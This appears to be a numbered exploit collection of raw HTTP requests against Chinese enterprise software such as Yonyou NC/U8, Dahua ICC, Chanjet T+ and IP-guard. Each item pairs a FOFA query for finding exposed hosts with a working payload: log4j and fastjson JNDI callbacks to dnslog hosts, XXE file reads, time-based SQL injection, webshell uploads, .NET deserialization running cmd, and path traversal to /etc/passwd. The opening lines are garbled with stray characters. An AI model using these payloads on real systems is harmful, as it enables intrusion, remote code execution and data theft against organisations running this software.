Accept-Encoding: gzip9 m7 Q& L& v. t! T- X( M
Connection: close
4 \5 m2 \9 ], v# EContent-Type: application/json;charset=utf-8
( h: x& ?) k7 H$ Z) _2 n6 N% ?0 E5 w
{' {; x. `2 V, k4 V
"a":{ n5 b; i- I9 z; N* o
"@type":"com.alibaba.fastjson.JSONObject",& S# a6 a9 g6 y6 O8 [& M
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"} B& Z* S2 ]# B+ Y) G9 i
}"") F4 }1 u# k( N5 u: }
}# w. Z3 `( i6 Y9 b6 s% d
% [' n. j1 C8 L8 L
4 T% k% s5 d% }' }. ?0 m
22. 大华ICC智能物联综合管理平台 log4j远程代码执行 h$ m) ^ n% A$ |
FOFA:icon_hash="-1935899595"
, r* J, A7 y1 d3 p. SPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.13 K; t7 |4 a6 b0 C5 F1 J# K
Host: your-ip, e4 k4 \/ x. t. O! t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. E: }. z, k& `0 ~
Content-Type: application/json;charset=utf-8
/ C7 y9 N! x4 l# D: X) O3 h& H' h+ B& A7 M: i
{
7 c6 K* T# d! }/ d"loginName":"${jndi:ldap://dnslog}"
' E, X4 ~3 B2 K( e) p! C}' F& @: I8 n3 Z6 M3 H
) S) |. H8 G, @8 w/ g( `% o& ?& B, ^8 _1 f: {1 b
$ b' J% C' t& t% c1 w; f' h23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
6 D a2 ^; h, V8 N+ UFOFA:icon_hash="-1935899595"4 i( J3 x- b! ^' t9 u4 Z: G- I4 a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: M$ g/ C$ x. u/ l- t/ Y' EHost: your-ip8 A- X0 D6 {9 @$ q7 u* J9 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, Y2 L0 x# q/ O6 [2 z
Content-Type: application/json;charset=utf-8( V3 D3 f# N0 m0 X9 K: z
Accept-Encoding: gzip" k8 R* r0 B) C1 u
Connection: close b7 L: _3 q3 b3 \* K# i' U
6 m7 x. r( ]3 }" `# Y
{
) O& O( C2 O! C8 \& u, V0 A' S "a":{# I) L/ z) F ]% x* b/ R7 M
"@type":"com.alibaba.fastjson.JSONObject",9 U6 n3 i" s' s7 l" C# ~4 z+ I6 g
{"@type":"java.net.URL","val":"http://DNSLOG"}
/ D4 C( r6 I4 T9 @" L4 L6 t6 _ }""2 F3 F) C5 c0 q8 Y
}
. z) G" F; C* w+ }6 d- k- p {) b/ g; j' C
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA: app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA: app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA: icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA: icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA: app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA: app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA: app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA: app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA: app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA: title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA: app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA: app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA: app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA: app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA: app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA: app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:2229
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA: app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++ Cloud government finance cloud, arbitrary file read
FOFA: body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA: title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA: body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA: body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA: app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA: app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA: app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA: app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes a fixed string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA: app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
